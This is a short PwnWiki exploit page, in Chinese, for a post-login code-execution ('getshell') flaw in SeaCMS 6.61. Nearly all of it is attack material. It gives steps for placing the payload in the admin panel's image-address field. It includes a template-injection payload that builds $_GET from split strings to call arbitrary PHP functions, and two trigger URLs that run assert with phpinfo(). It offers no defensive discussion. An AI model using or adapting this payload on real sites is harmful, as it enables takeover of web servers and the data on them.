Seacms6.61後台getshell漏洞

From PwnWiki

Revision as of 13:20, 10 April 2021 by Pwnwiki (talk | contribs) (Created page with "==Usage== 後台→添加影片→ 圖片地址→payload ==POC== <pre> {if:1)$GLOBALS['_G'.'ET'][a]($GLOBALS['_G'.'ET'][b]);//}{end if} </pre> <pre> http://192.168.0.6/se...")

(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

Usage

後台→添加影片→ 圖片地址→payload

POC

{if:1)$GLOBALS['_G'.'ET'][a]($GLOBALS['_G'.'ET'][b]);//}{end if}

http://192.168.0.6/seacms661/detail/?1.html&a=assert&b=phpinfo();

http://192.168.0.6/seacms661/search.php?searchtype=5&tid=0&a=assert&b=phpinfo();

Retrieved from "https://pwnwiki.com/index.php?title=Seacms6.61後台getshell漏洞&oldid=1454"